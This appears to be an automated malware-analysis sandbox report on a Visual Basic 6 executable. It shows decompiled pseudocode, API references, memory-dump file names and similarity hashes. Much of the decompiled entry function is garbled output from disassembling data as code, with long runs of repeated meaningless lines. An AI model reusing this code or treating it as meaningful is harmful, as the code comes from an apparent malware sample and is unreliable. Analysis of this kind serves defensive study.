				char* _t28;
				char* _t32;
				void* _t41;
				void* _t43;
				long long* _t44;

				_t44 = _t43 - 0xc;
				 *[fs:0x0] = _t44;
				L00401420();
				_v16 = _t44;
				_v12 = 0x4013e8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x34,  *[fs:0x0], 0x401426, _t41);
				_v60 = L"HLDNINGSKOEFFICIENTERS";
				_v68 = 8;
				L004015BE();
				_push(0);
				_t28 =  &_v52;
				_push(_t28); // executed
				L004014CE(); // executed
				L00401678();
				_t32 =  &_v52;
				L0040164E();
				asm("fldz");
				_push(_t32);
				_push(_t32);
				 *_t44 = __fp0;
				L004015B8();
				L004015F4();
				asm("fcomp qword [0x401280]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags != 0) {
					_v60 = L"Helligaftenens";
					_v68 = 8;
					L004015BE();
					_t28 =  &_v52;
					_push(_t28);
					L004015C4();
					L0040164E();
				}
				_v36 = 0x2986ba0;
				_v32 = 0x5af9;
				asm("wait");
				_push(E0040AC18);
				L0040166C();
				return _t28;
			}

0x0040ab37
0x0040ab46
0x0040ab50
0x0040ab58
0x0040ab5b
0x0040ab62
0x0040ab71
0x0040ab74
0x0040ab7b
0x0040ab88
0x0040ab8d
0x0040ab8f
0x0040ab92
0x0040ab93
0x0040ab9d
0x0040aba2
0x0040aba5
0x0040abaa
0x0040abac
0x0040abad
0x0040abae
0x0040abb1
0x0040abb6
0x0040abbb
0x0040abc1
0x0040abc3
0x0040abc4
0x0040abc6
0x0040abcd
0x0040abda
0x0040abdf
0x0040abe2
0x0040abe3
0x0040abeb
0x0040abeb
0x0040abf0
0x0040abf7
0x0040abfe
0x0040abff
0x0040ac12
0x0040ac17

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0040AB50
__vbaVarDup.MSVBVM60 ref: 0040AB88
#645.MSVBVM60(?,00000000), ref: 0040AB93
__vbaStrMove.MSVBVM60(?,00000000), ref: 0040AB9D
__vbaFreeVar.MSVBVM60(?,00000000), ref: 0040ABA5
#583.MSVBVM60(?,?,?,00000000), ref: 0040ABB1
__vbaFpR8.MSVBVM60(?,?,?,00000000), ref: 0040ABB6
__vbaVarDup.MSVBVM60(?,?,?,00000000), ref: 0040ABDA
#529.MSVBVM60(?,?,?,?,00000000), ref: 0040ABE3
__vbaFreeVar.MSVBVM60(?,?,?,?,00000000), ref: 0040ABEB
__vbaFreeStr.MSVBVM60(0040AC18,?,?,?,00000000), ref: 0040AC12

Memory Dump Source

Source File: 00000000.00000002.457742427.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.457737838.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.457750719.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.457755682.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#529#583#645ChkstkMove
String ID:
API String ID: 110701385-0
Opcode ID: ee15720b775e463f9b964aaa3a957176008899bac6e647140a92941e59a1a130
Instruction ID: 9e0f7dff25fc9b174070adf7dfeb85389613808bc0d099f1f6594bb627a50173
Opcode Fuzzy Hash: ee15720b775e463f9b964aaa3a957176008899bac6e647140a92941e59a1a130
Instruction Fuzzy Hash: 7221A370910218ABDB00EF91DD9AEDEBBB8BF40708F44852AB5017A1E1DB785949CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040169C, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 217
COMMON

Download Yara Rule

C-Code - Quality: 66%

			_entry_(signed int __eax, void* __ebx, intOrPtr* __ecx, void* __edx, signed int __edi, void* __fp0, char _a1, intOrPtr _a10, char _a64, intOrPtr _a78, char _a110, char _a4194368, intOrPtr _a614203390) {
				void* _v1;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				char _v44;
				intOrPtr _v97;
				intOrPtr _v109;
				char _v112;
				long long* _v113;
				char* _v120;
				intOrPtr _v128;
				char* _v136;
				intOrPtr _v144;
				char _v145;
				intOrPtr _v152;
				intOrPtr _v160;
				char _v161;
				char _v177;
				void* _v180;
				signed int _v184;
				signed int _v192;
				char _v193;
				intOrPtr* _v196;
				signed int _v200;
				signed int _v221;
				char _v229;
				short _v281;
				intOrPtr _v65472;
				intOrPtr* _t266;
				signed char _t272;
				signed char _t273;
				intOrPtr* _t274;
				intOrPtr* _t275;
				signed int _t276;
				signed int _t278;
				intOrPtr* _t280;
				signed char _t282;
				signed char _t283;
				intOrPtr* _t284;
				signed int _t285;
				intOrPtr* _t286;
				signed char _t287;
				intOrPtr* _t288;
				intOrPtr* _t289;
				signed char _t290;
				intOrPtr* _t292;
				intOrPtr* _t293;
				signed char _t295;
				signed int _t296;
				signed int _t297;
				signed int _t300;
				intOrPtr* _t303;
				intOrPtr* _t305;
				signed int _t306;
				signed int _t307;
				signed int _t310;
				signed int _t311;
				intOrPtr* _t312;
				intOrPtr* _t313;
				intOrPtr* _t314;
				intOrPtr* _t315;
				intOrPtr* _t316;
				intOrPtr* _t317;
				intOrPtr* _t318;
				signed char _t319;
				signed char _t320;
				signed char _t321;
				signed char _t322;
				signed char _t323;
				signed int _t325;
				intOrPtr* _t328;
				signed int _t329;
				signed int _t332;
				signed char* _t334;
				signed int _t336;
				signed int _t337;
				signed char _t340;
				signed int _t345;
				signed char _t353;
				intOrPtr* _t354;
				void* _t355;
				intOrPtr* _t357;
				intOrPtr* _t359;
				intOrPtr* _t361;
				void* _t363;
				intOrPtr* _t365;
				void* _t367;
				intOrPtr* _t369;
				intOrPtr* _t370;
				short _t381;
				char* _t391;
				signed int _t399;
				signed char _t406;
				signed char _t407;
				void* _t408;
				intOrPtr* _t409;
				intOrPtr* _t413;
				intOrPtr* _t414;
				intOrPtr* _t416;
				void* _t417;
				intOrPtr* _t418;
				void* _t419;
				signed int _t426;
				void* _t427;
				signed int* _t428;
				intOrPtr* _t429;
				intOrPtr* _t430;
				intOrPtr* _t431;
				signed int _t432;
				signed int _t439;
				void* _t442;
				intOrPtr _t447;
				intOrPtr* _t448;
				signed int _t449;
				intOrPtr* _t450;
				signed int _t452;
				signed int _t457;
				signed int _t459;
				char* _t464;
				signed int _t468;
				void* _t469;
				signed int _t471;
				void* _t472;
				void* _t474;
				long long* _t475;
				long long* _t476;
				signed int _t479;
				intOrPtr _t481;
				intOrPtr _t482;
				intOrPtr _t496;
				signed int _t497;
				short _t511;
				void* _t515;
				long long _t516;

				_t515 = __fp0;
				_t452 = __edi;
				_t434 = __ecx;
				L00401696(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				_t266 = __eax + 1;
				 *_t266 =  *_t266 + _t266;
				 *_t266 =  *_t266 + _t266;
				 *_t266 =  *_t266 + _t266;
				_t447 = __edx + __ecx;
				asm("into");
				asm("bound edi, [esi-0x74dbd20e]");
				_t426 = __ebx - 1;
				asm("sahf");
				asm("lock mov bh, 0xd0");
				asm("stc");
				 *0x21 = 0x21 +  *0x21;
				 *0x21 = 0x21 +  *0x21;
				 *0x21 = 0x21 +  *0x21;
				 *0x21 = 0x21 +  *0x21;
				 *0x21 = 0x21 +  *0x21;
				 *0x21 = 0x21 +  *0x21;
				0x63431258(_t464, "VB5!6&*");
				_t457 =  *(_t447 + 0x63) * 0x6f766d75;
				asm("insb");
				if(_t457 == 0) {
					 *[gs:eax] =  *[gs:eax] + __ecx;
					_t434 = __ecx + 1;
					 *0x21 = 0x21 +  *0x21;
					 *0x21 = 0x21 +  *0x21;
					_t431 = _t426 + _t426;
					asm("int3");
					 *0x21 =  *0x21 ^ 0x00000021;
					asm("cmpsb");
					_t2 = _t447;
					_t447 =  *_t431;
					 *_t431 = _t2;
					_t432 = _t431 - 1;
					asm("stosd");
					asm("popfd");
					_push(_t457);
					asm("out dx, al");
					asm("movsd");
					asm("lock inc eax");
					_t457 = 0x671cb309;
					0x21 = _t432;
					_push(ss);
					goto 0x4f3a;
					asm("lodsd");
					_t426 = _t432 << 0x00000001 ^  *(_t434 - 0x48ee309a);
					_t479 = _t426;
					asm("cdq");
					asm("iretw");
					asm("adc [edi+0xaa000c], esi");
					asm("pushad");
					asm("rcl dword [ebx], cl");
					 *0x21 = 0x21 +  *0x21;
					 *0x21 = 0x21 +  *0x21;
					 *0x21 = 0x21 +  *0x21;
					 *0x21 = 0x21 +  *0x21;
					 *0x21 = 0x21 +  *0x21;
					 *0x21 = 0x21 +  *0x21;
					 *0x21 = 0x21 +  *0x21;
					 *0x21 = 0x21 +  *0x21;
					 *0x21 = 0x21 +  *0x21;
					 *0x21 = 0x21 +  *0x21;
					 *0x21 = 0x21 +  *0x21;
					 *0x21 = 0x21 +  *0x21;
					 *0x21 = 0x21 +  *0x21;
					 *0x21 = 0x21 +  *0x21;
					 *0x21 = 0x21 +  *0x21;
					 *0x21 = 0x21 +  *0x21;
					 *[es:eax] = 0x21 +  *[es:eax];
					 *0x21 =  *0x21 + _t434;
					 *0x21 = 0x21 +  *0x21;
					 *0x21 =  *0x21 + _t434;
					 *0x671CB37E =  *((intOrPtr*)(0x671cb37e)) + _t434;
					asm("popad");
					asm("outsb");
					asm("arpl [ebp+0x72], sp");
				}
				if (_t479 >= 0) goto L6;
				_t268 = 0x47000921;
				asm("outsd");
				asm("outsb");
				asm("a16 outsd");
				if(0x47000921 < 0) {
					L14:
					asm("insd");
					asm("popad");
					asm("outsb");
					 *[fs:eax] =  *[fs:eax] ^ _t268;
					goto L15;
				} else {
					if(0x47000921 >= 0) {
						L15:
						_t268 = _t268 + 1;
						 *_t268 =  *_t268 | _t268;
						_t472 = _t471 - 1;
						_push(_t426);
						_push(_t472);
						_t448 = _t447 + 1;
						_t434 = _t434 + 1 - 1;
						_t471 = _t472 - 1;
						_t464 =  &_a1;
						_t457 = _t457 - 1;
						 *((intOrPtr*)(_t268 + _t452 * 2)) =  *((intOrPtr*)(_t268 + _t452 * 2)) + _t268;
						goto L16;
					} else {
						 *_t434 =  *_t434 + _t426;
						 *0x47000921 = 0x47000921 +  *0x47000921;
						_t448 = _t447 + 1;
						 *_t448 =  *_t448 + 0x47000921;
						 *(_t434 + _t434) =  *(_t434 + _t434) + _t471;
						_t9 = _t452 + 0x6f;
						 *_t9 =  *((intOrPtr*)(_t452 + 0x6f)) + 0x47000921;
						_t481 =  *_t9;
						asm("outsb");
						asm("a16 outsd");
						if(_t481 < 0) {
							L16:
							_t268 = _t268 + 0x78;
							 *((intOrPtr*)(_t268 + 3)) =  *((intOrPtr*)(_t268 + 3)) + _t434;
							_t452 = 0x1101ef04;
							goto L17;
						} else {
							if(_t481 >= 0) {
								L17:
								 *_t434 =  *_t434 + _t448;
								 *_t426 =  *_t426 + 1;
								_t272 = (_t268 + 0x000000ef +  *((intOrPtr*)(_t268 + 0xef)) & 0x03000000) + 0x78655400;
								if(_t272 == 0) {
									_t273 = _t272 |  *_t272;
									_push(_t273);
									_push(_t448);
									_push(_t426);
									_push(_t464);
									_t426 = _t426 + 1;
									_t274 = _t273 - 1;
									_t434 = _t434 + 2 - 1 + 1;
									 *_t448 =  *_t448 + _t448;
									 *_t274 =  *_t274 + _t274;
									 *_t426 =  *_t426 + 1;
									_t275 = _t274 -  *_t274;
									 *_t275 =  *_t275 + _t275;
									_t276 = _t275 + 0x72460006;
									asm("popad");
									asm("insd");
									 *[gs:eax] =  *[gs:eax] ^ _t276;
									_t278 = _t276 +  *_t434 |  *(_t276 +  *_t434);
									_t452 = _t452 + 1;
								} else {
									 *_t448 =  *_t448 + _t272;
									_t417 = _t272 + 0xf8;
									_pop(es);
									if (_t417 < 0) goto L19;
									_t452 = 0xb01ef04;
									_push(es);
									_a78 = _a78 + _t448;
									_t418 = _t417 - 1;
									_t464 =  &_a1;
									_t471 = _t471 - 1;
									_push(_t418);
									 *_t448 =  *_t448 + _t448;
									 *_t418 =  *_t418 + _t418;
									 *_t426 =  *_t426 + 1;
									 *_t418 =  *_t418 - _t418;
									 *_t418 =  *_t418 + _t418;
									goto L20;
								}
							} else {
								 *0x1874 =  *0x1874 + _t448;
								asm("movlps [eax], xmm0");
								_t434 = _t434 + _t434;
								asm("adc [eax], al");
								 *((intOrPtr*)(_t426 + 0x16)) =  *((intOrPtr*)(_t426 + 0x16)) + _t426;
								 *0x47000921 = 0x47000921 +  *0x47000921;
								_t471 = _t471 + 1;
								 *((intOrPtr*)(_t457 + 3)) =  *((intOrPtr*)(_t457 + 3)) + 0x47000921;
								 *_t434 =  *_t434 + 1;
								 *0x47000921 =  *0x47000921 ^ 0x47000921;
								 *0x47000921 = 0x47000921 +  *0x47000921;
								 *0x47000921 =  *0x47000921 + _t434;
								 *((intOrPtr*)(_t426 + 0x6f)) =  *((intOrPtr*)(_t426 + 0x6f)) + 0x47000921;
								asm("insd");
								asm("insd");
								asm("popad");
								asm("outsb");
								_t418 = (0x47000921 ^  *[fs:eax]) + 1;
								_push(cs);
								_t17 = _t434 + 0x67;
								 *_t17 =  *((intOrPtr*)(_t434 + 0x67)) + _t418;
								_t482 =  *_t17;
								if(_t482 < 0) {
									L20:
									_t419 = _t418 + 5;
									goto L21;
								} else {
									if(_t482 >= 0) {
										L22:
										 *_t278 =  *_t278 ^ _t278;
									} else {
										asm("outsd");
										asm("a16 jb 0x64");
										if(_t482 < 0) {
											L21:
											_t278 = _t419 + 0x78655400;
											if (_t278 == 0) goto L25;
											goto L22;
										} else {
											_t471 =  *_t426 * 0x48078004;
											_t452 = _t452 +  *((intOrPtr*)(_t452 + 0x1101ef04));
											 *_t426 =  *_t426 + 1;
											_t268 = _t418 +  *_t418 -  *((intOrPtr*)(_t418 +  *_t418));
											 *_t268 =  *_t268 + _t268;
											_t434 = _t434 +  *_t268;
											 *((intOrPtr*)(_t426 + 0x6f)) =  *((intOrPtr*)(_t426 + 0x6f)) + _t268;
											asm("insd");
											goto L14;
										}
									}
								}
							}
						}
					}
				}
				_t459 = _t457;
				_push(_t278);
				_push(_t448);
				_push(_t459);
				_t468 =  &_a1;
				 *0x78 =  *0x78 + _t278;
				asm("cmpsd");
				_t427 = _t426 + _t426;
				_t280 = (_t278 | 0x04120c3f) +  *((intOrPtr*)((_t278 | 0x04120c3f) + (_t278 | 0x04120c3f)));
				_push(es);
				 *_t280 =  *_t280 + _t280;
				 *((intOrPtr*)(_t280 + 0x2d)) =  *((intOrPtr*)(_t280 + 0x2d)) + _t280;
				 *((intOrPtr*)(_t459 + 0x42)) =  *((intOrPtr*)(_t459 + 0x42)) + _t448;
				_t282 = _t280 + 0x00000001 ^ 0x2a263621;
				 *_t282 =  *_t282 + _t282;
				 *_t282 =  *_t282 + _t282;
				 *_t282 =  *_t282 + _t282;
				 *_t282 =  *_t282 + _t282;
				 *_t282 =  *_t282 + _t282;
				 *_t282 =  *_t282 + _t282;
				 *_t459 =  *_t459 + _t427;
				 *_t282 =  *_t282 + _t282;
				 *_t282 =  *_t282 + _t282;
				 *_t282 =  *_t282 + _t282;
				 *_t282 =  *_t282 + _t282;
				 *_t282 =  *_t282 + _t282;
				 *_t282 =  *_t282 + _t282;
				_t283 = _t282 |  *_t282;
				 *(_t283 + _t283) =  *(_t283 + _t283) | _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *((intOrPtr*)(_t427 + _t427 + 0x40)) =  *((intOrPtr*)(_t427 + _t427 + 0x40)) + _t448;
				 *((intOrPtr*)(_t283 + _t459 * 8)) =  *((intOrPtr*)(_t283 + _t459 * 8)) + _t427;
				 *_t283 =  *_t283 ^ _t283;
				_t428 = _t427 + _t427;
				asm("invalid");
				 *_t283 =  *_t283 | _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				 *_t283 =  *_t283 + _t283;
				_t284 = _t283 +  *_t283;
				 *_t284 =  *_t284 + _t284;
				goto 0x144018c1;
				asm("sbb [eax], eax");
				asm("insb");
				asm("sbb [eax], al");
				_t285 = _t284 + 1;
				 *_t285 =  *_t285 + _t428;
				 *_t285 =  *_t285 + _t285;
				 *_t285 =  *_t285 + 0x910000;
				 *_t285 =  *_t285 + _t285;
				_t286 = _t448;
				_t449 = _t285;
				 *_t286 =  *_t286 + _t286;
				 *_t286 =  *_t286 + _t286;
				 *_t286 =  *_t286 + _t286;
				 *_t286 =  *_t286 + _t286;
				 *_t286 =  *_t286 + _t286;
				 *_t286 =  *_t286 + _t286;
				 *_t286 =  *_t286 + _t286;
				 *_t286 =  *_t286 + _t286;
				 *_t286 =  *_t286 + _t286;
				 *((intOrPtr*)(_t434 + 0x6d + _t468 * 2)) =  *((intOrPtr*)(_t434 + 0x6d + _t468 * 2)) + _t286;
				asm("insd");
				asm("outsd");
				asm("arpl [ebx+0x35], bp");
				_t54 =  &_a110;
				 *_t54 = _a110 + _t449;
				_t496 =  *_t54;
				asm("arpl [edi+0x6e], bp");
				if(_t496 >= 0) {
					L35:
					 *_t286 =  *_t286 + _t286;
					 *_t452 =  *_t452 + _t286;
					goto L36;
				} else {
					if(_t496 < 0) {
						L36:
						asm("salc");
						_t63 = _t428;
						_t428 = _t452;
						_t452 = _t63;
						asm("stosb");
						goto L37;
					} else {
						asm("outsb");
						asm("a16 insb");
						if (_t496 >= 0) goto L29;
						_t56 =  &(_t428[0x1a]);
						 *_t56 = _t428[0x1a] + _t286;
						_t497 =  *_t56;
						if(_t497 < 0) {
							L37:
							asm("wait");
							_t471 = _t468;
							_pop(_t468);
							if(_t468 <= _t452) {
								 *_t286 =  *_t286 + _t286;
								 *_t286 =  *_t286 + _t286;
								 *_t286 =  *_t286 + _t286;
								 *(_t452 + 1) =  *(_t452 + 1) + _t428;
								 *_t286 =  *_t286 + _t286;
								 *_t286 =  *_t286 + _t286;
								 *_t286 =  *_t286 + _t286;
								asm("in al, dx");
								_push(ss);
								_t286 = _t286 + 1;
								 *((intOrPtr*)(_t286 + _t286)) =  *((intOrPtr*)(_t286 + _t286)) + _t434;
								 *_t286 =  *_t286 + _t449;
								goto L35;
							}
							_t286 = 0x72;
							goto L39;
						} else {
							if(_t497 != 0) {
								L39:
								 *_t286 =  *_t286 + _t286;
								 *_t286 =  *_t286 + _t286;
								goto L40;
							} else {
								if(_t497 <= 0) {
									L40:
									 *_t286 =  *_t286 + _t286;
									 *_t286 =  *_t286 + _t286;
									 *_t286 =  *_t286 + _t286;
									 *_t286 =  *_t286 + _t286;
									goto L41;
								} else {
									asm("insb");
									if(_t497 != 0) {
										L41:
										 *_t286 =  *_t286 + _t286;
										 *_t434 =  *_t434 + _t286;
										 *_t286 =  *_t286 + _t286;
										 *_t286 =  *_t286 + _t286;
										 *_t286 =  *_t286 + _t286;
										 *_t286 =  *_t286 + _t286;
										 *_t286 =  *_t286 + _t286;
										 *_t286 =  *_t286 + _t286;
										 *_t286 =  *_t286 + _t286;
										 *_t286 =  *_t286 + _t286;
										 *_t286 =  *_t286 + _t286;
										 *_t286 =  *_t286 + _t286;
										 *_t286 =  *_t286 + _t286;
										 *_t452 =  *_t452 + _t434;
										_t439 = _t434 - 1;
										 *_t286 =  *_t286 + _t286;
										 *_t286 =  *_t286 + _t286;
										 *_t286 =  *_t286 + _t286;
										asm("lodsb");
										asm("das");
										_t287 = _t286 + 1;
										 *((intOrPtr*)(_t287 + _t287 + 0x10000)) =  *((intOrPtr*)(_t287 + _t287 + 0x10000)) + _t428;
										 *_t287 =  *_t287 + _t287;
										 *_t428 =  *_t428 ^ _t287;
										_t288 = _t287 + 1;
										 *_t288 =  *_t288 + _t288;
										 *_t288 =  *_t288 + _t288;
										_t289 = _t288 + _t428;
										if(_t289 == 0) {
											_t428 = _t428 + _t428;
											asm("invalid");
											 *_t289 =  *_t289 + 1;
											 *_t289 =  *_t289 + _t289;
											 *((intOrPtr*)(_t428 - 0x3fe3ffc0)) =  *((intOrPtr*)(_t428 - 0x3fe3ffc0)) + _t449;
											_t413 = _t289 + 1;
											 *_t413 =  *_t413 + _t413;
											 *_t413 =  *_t413 + _t413;
											_t414 = _t413 + _t413;
											 *(_t414 + _t414) =  *(_t414 + _t414) & 0x00000000;
											 *_t414 =  *_t414 + _t414;
											 *_t414 =  *_t414 + _t414;
											 *_t414 =  *_t414 + _t414;
											 *_t414 =  *_t414 + _t414;
											 *_t414 =  *_t414 + _t414;
											 *((intOrPtr*)(_t428 + _t449)) =  *((intOrPtr*)(_t428 + _t449)) + _t439;
											_t286 = _t414 + 1;
											 *_t439 =  *_t439 + _t286;
											 *_t286 =  *_t286 + _t286;
											 *((intOrPtr*)(_t452 +  &_a64)) =  *((intOrPtr*)(_t452 +  &_a64)) + _t449;
											 *_t286 =  *_t286 + _t286;
											goto L43;
										}
									} else {
										 *[gs:eax] =  *[gs:eax] + _t286;
										_push(_t286);
										 *_t286 =  *_t286 + _t286;
										_t439 = _t434 + _t434;
										asm("a16 cmpsb");
										_t449 =  *_t428;
										 *_t428 = 0x1c;
										_t428 = _t428 - 1;
										asm("stosd");
										asm("popfd");
										_push(_t459);
										asm("out dx, al");
										_push(_t428);
										asm("movsd");
										L43:
										 *_t286 =  *_t286 + _t286;
										 *_t286 =  *_t286 + _t286;
										_t416 = _t286 - 0x1a + 1;
										 *_t439 =  *_t439 + _t416;
										 *_t416 =  *_t416 + _t416;
										 *((intOrPtr*)(_t428 + _t449)) =  *((intOrPtr*)(_t428 + _t449)) + _t449;
										_t289 = _t416 + 1;
									}
								}
							}
						}
					}
				}
				 *_t289 =  *_t289 + _t289;
				 *_t289 =  *_t289 + _t289;
				 *_t289 =  *_t289 + _t449;
				asm("sbb al, [eax]");
				_t290 = _t289 +  *_t289;
				 *_t290 =  *_t290 + _t290;
				_t292 = (_t290 ^ 0x0000001a) + 1;
				 *_t292 =  *_t292 + _t292;
				 *((intOrPtr*)(_t452 + 0x6c006801)) =  *((intOrPtr*)(_t452 + 0x6c006801)) + _t449;
				 *((intOrPtr*)(_t449 + _t428 - 0x3cafffc0)) =  *((intOrPtr*)(_t449 + _t428 - 0x3cafffc0)) + _t292;
				_t293 = _t292 + 1;
				 *_t293 =  *_t293 + _t293;
				 *_t293 =  *_t293 + _t293;
				 *_t293 =  *_t293 + _t439;
				asm("out dx, eax");
				 *_t293 =  *_t293 - _t293;
				 *((intOrPtr*)(_t452 +  &_a4194368)) =  *((intOrPtr*)(_t452 +  &_a4194368)) + _t449;
				asm("adc [eax], eax");
				_t295 = _t293 + 0x00000001 ^ 0x00000000;
				 *_t295 =  *_t295 + _t295;
				asm("lodsb");
				_t296 = _t295 & 0x00000040;
				 *_t439 =  *_t439 + _t296;
				 *_t428 =  *_t428 + _t296;
				 *_t296 =  *_t296 + _t296;
				 *_t296 =  *_t296 + _t296;
				 *_t296 =  *_t296 + _t296;
				 *_t296 =  *_t296 + _t296;
				 *((intOrPtr*)( &(_t428[0x186a0010]) + _t449)) =  *((intOrPtr*)( &(_t428[0x186a0010]) + _t449)) + _t296;
				_t297 = _t296 & 0x402fa400;
				 *_t439 =  *_t439 + _t297;
				 *_t428 =  *_t428 + _t297;
				 *_t297 =  *_t297 + _t297;
				_pop(ds);
				 *_t297 =  *_t297 + _t428;
				 *_t297 =  *_t297 + _t297;
				_v65472 = _v65472 + _t297;
				asm("invalid");
				 *_t297 =  *_t297 + _t297;
				 *_t297 =  *_t297 + _t297;
				 *_t297 =  *_t297 + _t297;
				 *_t297 =  *_t297 + _t297;
				asm("loopne 0x1c");
				asm("popad");
				_t300 = _t297 + 0x00000001 + _t428 & 0x40259400;
				_t429 = _t428 + _t428;
				asm("invalid");
				 *_t300 =  *_t300 + 1;
				 *_t300 =  *_t300 + _t300;
				 *((intOrPtr*)(_t449 + _t429)) =  *((intOrPtr*)(_t449 + _t429)) + _t449;
				 *((intOrPtr*)(_t439 + _t429 + 0x16840040)) =  *((intOrPtr*)(_t439 + _t429 + 0x16840040)) + _t449;
				 *((intOrPtr*)(_t449 - 0x6fffbfea)) =  *((intOrPtr*)(_t449 - 0x6fffbfea)) + _t439;
				_push(ss);
				_t303 = _t300 + 3;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *_t303 =  *_t303 + _t303;
				 *((intOrPtr*)(_t449 + _t429 + 0x40)) =  *((intOrPtr*)(_t449 + _t429 + 0x40)) + _t429;
				 *((intOrPtr*)(_t439 + _t429 + 0x16840040)) =  *((intOrPtr*)(_t439 + _t429 + 0x16840040)) + _t449;
				 *((intOrPtr*)(_t449 - 0x6fffbfea)) =  *((intOrPtr*)(_t449 - 0x6fffbfea)) + _t439;
				_push(ss);
				_t305 = _t303 + 2;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				 *_t305 =  *_t305 + _t305;
				_t306 = _t305 + _t449;
				 *_t306 =  *_t306 + _t306;
				 *_t306 =  *_t306 + _t449;
				_t307 = _t306 &  *_t306;
				 *_t307 =  *_t307 + _t307;
				 *_t307 =  *_t307 + _t307;
				asm("scasd");
				 *((intOrPtr*)(_t439 + _t449 - 0x3ff80000)) =  *((intOrPtr*)(_t439 + _t449 - 0x3ff80000)) + _t439;
				_t310 =  *0x1000407f + 2;
				 *_t459 =  *_t459 + _t310;
				asm("adc al, 0x40");
				 *_t310 =  *_t310 + _t310;
				asm("rol byte [eax], 0x0");
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
				 *_t310 =  *_t310 + _t310;
